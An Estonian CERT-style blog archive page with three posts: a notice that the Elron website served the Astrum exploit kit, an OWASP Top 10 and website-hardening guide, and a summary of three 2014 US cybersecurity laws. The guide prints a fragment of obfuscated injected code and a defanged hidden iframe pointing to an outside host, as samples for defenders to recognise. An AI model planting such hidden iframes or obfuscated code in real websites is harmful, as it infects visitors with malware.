Author Archives: Liisa Tallinn

Pahavara levitamine elron.ee veebilehel

Kujutis on illustreeriv.

Kujutis on illustreeriv.

Pühapäeva pealelõunast esmaspäeva õhtuni jagati Elroni peamiselt veebilehelt www.elron.ee Astrum exploitkitiga “kingitusi” (pahavara). Kes kasutas pahavara jaoks sobilikku tarkvarakomplekti lehe külastamisel, osutus kvalifitseeruvaks ja sai sealt suunamise IP-le 46.105.233.200 porti 6219. Järgnes suure tõenäosusega nakatumine. Nakatavast tegelasest endast saab lugeda SIIT.

Tavakasutaja, kes külastas sel ajavahemikul Elroni veebilehte, võiks oma arvuti turvatarkvaraga täiendavalt üle kontrollida.

Pahavara levitamiseks kasutati neid haavatavusi:

 • Adobe Flash (CVE-2014-0515, CVE-2013-0634)
 • MS Silverlight (CVE-2013-0074, CVE-2013-3896)
 • Adobe PDF (CVE-2010-0188)
 • IE <= 9 (CVE-2013-2551)
 • IE 10 & Flash >= 13.0.0.214 (CVE-2014-0322)
 • Java (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465)

Tuvastussoovitus süsteemiadministraatoritele: kui Sinu võrgus on arvuti, mis pöördus IP-aadressi 46.105.233.200 porti 6219,  tee sellele tööjaamale täiendav kontroll. Antud juhul ei ole võimalik kindlalt öelda, mis pahavara täpselt arvutisse sokutatakse.

Näpunäiteid veebilehe pidajatele, kuidas  sarnast juhtumit tulevikus vältida:

 • hoia lahus veebilehe admin osa veebilehest endast
 • haldamine peab toimuma krüpteeritud kanalite kaudu
 • haldusliidele ligipääs peab olema võimalik ainult asjakohastele IPdele ning keelatud teistele
 • varunda regulaarselt andmeid!

OWASP – ega ometi o-herilane?

Näide ühe .ee veebilehe näotustamiseks kasutatud pildist

CERT-EE infoturbe ekspert Triin Nigul tuletab veebilehtede arendajatele, haldajatele ja omanikele meelde, et veebide turvalisuse tõstmiseks pole vaja jalgratast leiutada.

Viimasel ajal meedias ohtralt kajastust leidnud andmelekete valguses on õige aeg kõnelda internetiturvalisusest veidi teise nurga alt kui tavalise arvutikasutaja vaatevinklist. Peaasjalikult räägin siin kirjutises veebilehtede turvalisusest. Nagu paljudes teisteski valdkondades, ei ole siingi põhjust hakata jalgratast leiutama. OWASP (Open Web Application Security Project) peaks olema tuntud igale (veebi)arendajale ja -haldajale, sest tegemist on üleilmselt tuntud ja tunnustatud (mittetulundusliku) organisatsiooniga. Teiste kiiduväärt, tarkvara turvalisust edendavate tegevuste seas peab OWASP nimekirja veebirakenduste kasutamisega seotud kümnest suuremast turvaohust. Alljärgnevalt lähemalt.

A1 – Süstimisrünne (ka süst, Injection)
Süstimisnõrkused (nt SQL injection) esinevad, kui käsku või päringut on võimalik pahaloomuliselt täiendada. Ründaja lisatud sisu võib sundida käivitama soovimatuid käske või võimaldada volitamata ligipääsu andmetele.

A2 – Autentimis- ja sessioonihalduse vead (Broken Authentication and Session Management)
Autentimis- ja sessioonihaldus ei ole sageli korralikult rakendatud, võimaldades ründajatel näpata salasõnu, võtmeid või sessioonitunnuseid, või rakendusvigu konfidentsiaalsete andmete teadasaamiseks ära kasutada.

A3 – Murdskriptimine (Cross-Site Scripting – XSS)
XSS vead esinevad juhul, kui rakendus kuvab veebilehitsejas infot ilma korraliku valideerimise või tagasilükkamiseta. XSS vead lasevad ründajatel ohvri veebilehitsejas käivitada skripte, mis võimaldavad kasutajasessioone üle võtta, veebilehti näotustada või kasutaja pahaloomulisele veebilehele ümber suunata.

A4 – Objektide ebaturvaline otseviitamine (Insecure Direct Object References)
Objekti otseviitamine esineb, kui arendaja jätab avalikuks viite mõnele sisemisele rakendusdokumendile, nagu fail, kaust või andmebaasi võti. Ilma ligipääsukontrolli või muu tõkketa võivad ründajad neid viiteid töödeldes andmetele volitamata ligi pääseda.

A5 – Vigased turvaseaded (Security Misconfiguration)
Heatasemeline turvalisus nõuab turvalise seadistuse määratlemist, paigaldamist ja haldamist nii rakenduses, raamistikus, platvormis, rakendus-, veebi- ja andmebaasiserveris. Vaikimisi seaded on tihti ebaturvalised.
Veebisaitidel kasutatakse mitmesugust esitlus- jm tarkvara. Kui tarkvara on kehvasti seadistatud või uuendamata, võib süsteemile ligi saada turvaauke ära kasutades. Tarkvara pidev uuendamine on kohustuslik.

A6 – Tundliku info kaitseta jätmine (Sensitive Data Exposure)
Paljud veebirakendused ei kaitse tundlikku infot, nagu krediitkaardi- ja autentimisandmeid, piisavalt. Ründajad võivad kehvasti kaitstud andmeid omastades toime panna krediitkaardipettusi, identiteedivargusi või teisi kuritegusid. Tundlikud andmed nõuavad erilist kaitset, näiteks krüptimist andmete säilitamisel või edastamisel, ning erimeetmeid andmevahetusel veebilehitsejas.

A7 – Puuduv pääsukontroll funktsionaalsuse tasemel (Missing Function Level Access Control)
Paljud veebirakendused kontrollivad enne funktsionaalsuse näitamist veebilehitsejas ligipääsuõigusi. Siiski tuleks samasugune kontroll teha ka serveris. Kui pöördumisi ei kontrollita, võivad ründajad neid võltsides funktsionaalsusele volitamata ligi pääseda.

A8 – Päringu murdvõltsimine (Cross-Site Request Forgery – CSRF)
CSRF rünne sunnib sisseloginud ohvri veebilehitsejat auklikule veebirakendusele võltsitud http-päringut saatma, liites sellele ohvri sessiooniküpsise ja muu automaatselt lisatava autentimisinfo. See lubab ründajal ohvri veebilehitsejas luua päringuid, mille haavatav rakendus õigeks tunnistab.

A9 – Teadaolevalt auklike komponentide kasutamine (Using Components with Known Vulnerabilities)
Tarkvarakomponendid, nagu teegid ja raamistikud, vajavad töötamiseks täisõigusi. Auklikku komponenti ära kasutades võib rünne lõppeda tõsise andmekao või serveri ülevõtmisega. Rakendused, kus kasutatakse auklikke komponente, võivad nõrgendada rakenduse kaitsemeetmeid ja võimaldada erinevaid ründeid.

A10 – Kontrollimata ümbersuunamised ja edastamised (Unvalidated Redirects and Forwards)
Veebirakendused suunavad kasutajaid tihti teistele lehtedele või veebisaitidele, ning kasutavad kontrollimata infot sihtlehtede kindlaksmääramiseks. Ilma korraliku kontrollita võivad ründajad suunata ohvrid õngitsus- või pahavarasaitidele, või kasutada edastamisi volitamata ligipääsuks. Viimasel juhul on haäkitud saidi põhifunktsioon heausksed külastajad pahaloomulistele veebisaitidele läkitada.

Mida tasuks veebihalduse puhul veel tähele panna:

Kasutajatunnuste ja salasõnade turvasoovitused kehtivad ka administraatoritele:

 • Salasõnast on kasu, kui see on pikk, mitmekesine ja kordumatu.
 • Hästi jääb meelde mõnest fraasist tuletatud parool.
 • Salasõnade rist- või ühiskasutus on kurjast.
 • Vajadusel tuleks kasutada mõnda paroolide hoidmise tarkvahendit.

Enamik ründajatest proovib standardse “admin” kasutajatunnuse järele jõurünnet (brute force’i) ehk salasõna või krüptovõtme mõistatamist kõigi (sõnastikus leiduvate) variantide läbiproovimise teel.

Kui veebilehe administraatori arvutis pesitseb pahavara, mis kuulub klahvikuulaja (keylogger) või mõnda muud sorti salasõnanäppajate hulka, pole ka tugevast salasõnast kasu – kogu sisestatav info võidakse üles korjata ja pahalastele edastada. Haldusarvutisse peab olema installitud viirusetõrje, mida tuleb hoida ajakohasena.

Mis puudutab veebilehe kasutajate salasõnade hoidmist, siis kui aabitsatõde “paroole ei hoita lahtise tekstina” on juba kenasti rakendatud, võiks salasõnade räsidele lisada pisut “soola” (nt numbreid), ning tulemused omakorda krüpteerida.

Veebiserver ei pea käima administraatori õigustes. Miks? Sellest oleneb, missugused õigused saab ründaja pärast õnnestunud tegu.

Enamik saite saavad pihta automaatsete tööriistade abil – iga saidi jaoks ei jagu käsitöölisest häkkerit. Ründajad korduvkasutavad avalikult kättesaadavaid, isegi aastatevanuseid haavatavusi. Häkitud veebilehed on tavaliselt vigased rohkem kui ühel viisil. Mitte midagi head ei tõota näiteks kombinatsioon kehvasti konfitud süsteemist, mida pole alates paigaldamisest uuendatud, nigelatest salasõnadest ning säästumajutusteenusest. Ei maksa eeldada, et turvalisuse eest vastutab vaid veebimajutaja, eriti kui veebilehe omanik installib ise sisuhaldustarkvara nagu WordPress, Joomla!, Drupal või ka juhul, kui see on veebimajutaja paigaldatud. Samas – kui veebisaiti hallatakse järjepidevalt ja vastutustundlikult, ei peaks saidiomanik ülearu muretsema. Kui veebilehe turbe haldus käib ikkagi üle jõu, tuleks sõlmida leping vastava teenusepakkujaga. Ootamatute ebameeldivuste tarbeks tasub värske varukoopia (varundada vähemalt 1 x kuus) siiski käepärast hoida.

Sissemurdmiskahtluse korral leiab internetist mitmeid tööriistu, mida veebilehe kiirtestimiseks kasutada:
http://urlquery.net
http://sitecheck.sucuri.net/
http://wepawet.iseclab.org/
http://ddecode.com/phpdecoder/
https://www.virustotal.com/et/#url
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ria.ee
(domeeninimi asendada sobivaga)

NB! Viidatud tööriistad sobivad vaid kahtlusele kinnituse saamiseks ning info kiireks hankimiseks, mitte info ümberlükkamiseks. Teiseks, häkkerite lisatud koodirea või alamlehe kustutamisest tavaliselt ei piisa probleemi lahendamiseks. Vastasel juhul kuritarvitatakse saiti õige pea uuesti ja kurjemini. Kui saidiomanik ei halda oma veebisaiti ise, tuleb probleemist kohe teavitada veebihaldurit. Vajalikuks võib osutuda veebilehe ajutine mahavõtmine internetist. Probleemi taaskordumise vältimiseks tuleb kontrollida, ega kuhugi pole loodud tagaust ning uuendada veebiserveri, sisuhaldus- ja esitlustarkvara. Vahetada tuleb saidi haldamiseks kastutavad paroolid ning viirusetõrjega üle kontrollida haldamiseks kasutatavad arvutid.

Tavaliselt on nn tagauks mahult väike ning peidetud lõdvemate kasutajaõigustega jaotistesse nagu /images. Tagaukse ülesleidmisel ja äratundmisel võib abiks olla süvenemine failinimedesse- ja asukohta, failide muutmise kuupäevadesse, ligipääsuõigustesse ning sisusse. Ja nagu infoturbeintsidentide puhul ikka, ei saa üle ega ümber logide analüüsist.

Sisuhaldustarkvara häki puhul istutatakse pahakood tavaliselt kas veebilehe algusesse või lõppu, kuid see pole reegel. Iframe on mõne dokumendi või teise veebilehe sisu kuvamist võimaldav „raam“ veebilehe sees – pahatahtlust võib iframe puhul tavaliselt näidata kirjeldus „hidden“, see on aga koodist otse välja loetav vaid siis, kui pole kasutatud obfuskeerimist. Tükike sogastatud koodist:
7:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:

Näide pahaloomulisest iframe’ist veebilehe lõpus:
</html><iframe src=”hXXp://www.rachedsarkis.com/counter.php” style=”visibility: hidden; position: absolute; left: 0px; top: 0px” width=”10″ height=”10″/>

Rämpspost on kõigile tuttav nähtus, kuid paljud ei tea, et näiteks (võlts)ravimimüük käib ka veebisaitide kaudu. Kui saidiomanikule salaäri jääbki nähtamatuks, leiavad selle üles otsimootorid. Isegi kui rämpsposti saatmine veebisaiti üle ei koorma, tekib oht, et sait lisatakse Google’i või mõne teise otsimootori musta nimekirja, mis pahavaraga nakatunud saidi puhul juhtub niikuinii varem või hiljem.

Nõu ja abi saab näiteks:
https://www.stopbadware.org/webmaster-help
http://blog.aw-snap.info/

Google’i juhend juhuks, kui sait peaks sattuma Google’i musta nimekirja:
https://support.google.com/webmasters/answer/163633? hl=en&topic=2365140&ctx=topic

Google’i musta nimekirja sattumise puhuks peaks sait olema n-ö omaks tunnistatud, selleks tuleb läbida protsess, mis on kirjeldatud aadressil
https://support.google.com/webmasters/answer/34592.

Ameerika Ühendriikide kolm seadust küberjulgeoleku valdkonnas

allikas: http://homeland.house.gov/sites/homeland.house.gov/files/resize/images/NCCIP%20Graphic-400x355.jpg

Foto: USA Esindajatekoda

RIA küberturvalisuse teenistuse õigusspetsialist Jana Orlovski annab ülevaate sel suvel Ameerika Ühendriikides vastu võetud kolmest olulisest küberjulgeoleku tagamist reguleerivast seadusest.

28. juulil võttis USA esindajatekoda vastu kolm küberjulgeoleku valdkonna seadust: riikliku küberjulgeoleku ja kriitilise infrastruktuuri kaitse seaduse (“The National Cybersecurity and Critical Infrastructure Protection Act of 2014” ehk “NCCIP Act”), kriitilise infrastruktuuri teadus- ja arendustegevuse edendamise seaduse (“The National Critical Infrastructure Research and Development Advancement Act” ehk “CIRDA Act”) ja küberjulgeoleku “jalad maas” seaduse (“Homeland Security Cybersecurity Boots-on-the Ground Act“).

Eestis sarnaneb esimesele neist (“NCCIP Act”) hädaolukorra seadus, mis reguleerib elutähtsate teenuste (kriitilise infrastruktuuri) toimepidevuse tagamist. See seadus kohustab riigiasutusi korraldama elutähtsate teenuste toimepidevust ja teenuseosutajaid osutama elutähtsaid teenuseid. USAs on kriitilise infrastruktuuri kaitse üles ehitatud sektoripõhiselt. Sealsete elutähtsate teenuste regulatsioon on rangem ja konkreetsem. Paika on muuhulgas pandud ka organisatsiooniline töökorraldus, näiteks koordineeriva nõukogu tegevus.

Eestis on elutähtsad teenused jagatud korraldavate asutuste järgi, näiteks elektrivarustuse toimepidevuse eest vastutab Majandus- ja Kommunikatsiooniministeerium, joogivee ohutuse eest Sotsiaalministeerium, operatiivraadioside võrgu toimimise eest Siseministeerium, kiirgusohust varajase hoiatamise eest Keskkonnaministeerium jne. Elutähtsa teenuse osutajate kohustused elektroonilise turvalisuse tagamisel tulenevad Vabariigi Valitsuse määrusest “Elutähtsa teenuse infosüsteemide ning nendega seotud infovarade turvameetmed“. Samas puudub Eestis regulatsioon, mis kohustaks asutusi ja ettevõtteid jagama reealajas teavet küberohtude kohta. USAs paneb riigile sellise kohustuse “CIRDA Act”.

USAs vastu võetud kolme seaduse eesmärk on tugevdada valitsuse võimekust ennetada küberrünnakuid ja reageerida nendele. Seadused võeti vastu enamushääletusel. Esindajatekoja esimehe Michael McCauli sõnul võib edukas küberrünnak gaasijuhtme-, vee- või naftasüsteemi vastu põhjustada olulist majanduslikku kahju ja maksta isegi inimelusid: “Reaalsus on see, et küberoht on jõudmas ette meie valmisolekust sellega võidelda. Aeg on tegutseda ning riiklik küberjulgeoleku ja kriitilise infrastruktuuri kaitse seadus on oluline samm selle suunas”.

Riikliku küberjulgeoleku ja kriitilise infrastruktuuri kaitse seadust (“CIRDA Act”) tutvustati esmakordselt 2013. aasta detsembris ning see on neist kolmest kõige olulisem. Seaduse kohaselt on USA siseministril kriitilise infrastruktuuri kaitsmisel küberohtude eest laialdane vastutus ja volitus. Täpsemalt,minister on kohustatud rakendama jõupingutusi, et tugevdada ja säilitada turvaline, toimiv ning vastupidav kriitiline infrastruktuur. Selle jaoks tuleb kasutada valdkonna- ja tööstusharupõhiseid teadmisi, tuvastada küberohte ning pakkuda koolitust, nõu ja abi ettevõtete omanikele ning töötajatele. “CIRDA Act” kohustab muuhulgas riiklikku küberjulgeoleku ja kommunikatsiooni integratsiooni keskust jagama reaalajas teavet küberohtude kohta.

Seadus reguleerib ka era- ja avaliku sektori koostööd, et tagada ühiselt ning sektoripõhiselt kriitilise infrastruktuuri kaitse. Koostöö tagamiseks määrab minister kriitilise infrastruktuuri sektorid, nagu side, transport, makseteenused jms. Seejärel suhtleb minister eraettevõtetega sektoripõhiselt selleks määratud koordineerivate nõukogude kaudu. Nõukogu eesmärk on kajastada iga sektori eripärasid ja kaasata oma töösse kriitilise infrastruktuuri ettevõtete omanikud, töötajad ja kutseliidud. Ministri ja koordineeriva nõukogu koostöö tulemusel määratakse igale sektorile informatsiooni- ja analüüsikeskus, et jagada teavet kõigi koordineerivate nõukogudega. Seaduse kohaselt luuakse ka riiklik küberjulgeoleku ja side integratsioonikeskus (National Cybersecurity and Communications Integration Center), mis aitab jagada teavet küberohtude kohta reealajas riigiasutuste, eraettevõtete, koordineerivate nõukogude, CERTi ja teiste koostööpartnerite vahel. Lisaks luuakse USA siseministeeriumisse (Department of Homeland Security) CERTide meeskonnad, kes aitavad kriitilise infrastruktuuri ettevõtteid kriisisituatsioonides, kui ettevõtted avaldavad selleks soovi.

Kriitilise infrastruktuuri teadus- ja arendustegevuse edendamise seaduse eesmärk on tugevdada USA siseministeeriumi võimekust tegeleda teadustöö ja tehniliste hangetega. Seadus suurendab veelgi ministri rolli kriitilise infrastruktuuri kaitse tagamisel. Ministril on edaspidi kohustus koostada kriitilise infrastruktuuri kaitset tagavate tehnoloogiate uurimise ja arendamise plaan. See kaardistab tehnoloogiate riskid ja nõrkused ning prioriseerib riskide maandamiseks mõeldud meetmed. Seadus nõuab, et minister annaks kongressile aru ka eraettevõtete pakutavatest kriitilise infrastruktuuri teenustest ja samuti teenustest, mis saaksid kõige enam kasu turvatehnoloogia kiirest arengust.

Kolmas, küberjulgeoleku “jalad maas” seadus keskendub suuresti USA siseministeeriumi tööjõu arendamisele küberjulgeoleku valdkonnas. Seadus kohustab siseministeeriumit hindama oma riigi võimeid ja valmisolekut täita paremini kübevaldkonnas seatud eesmärke. Selleks koostatakse töötajate värbamise strateegia ning luuakse ühtne ametite liigitus, et hinnata küberjulgeoleku valdkonna tööjõudu.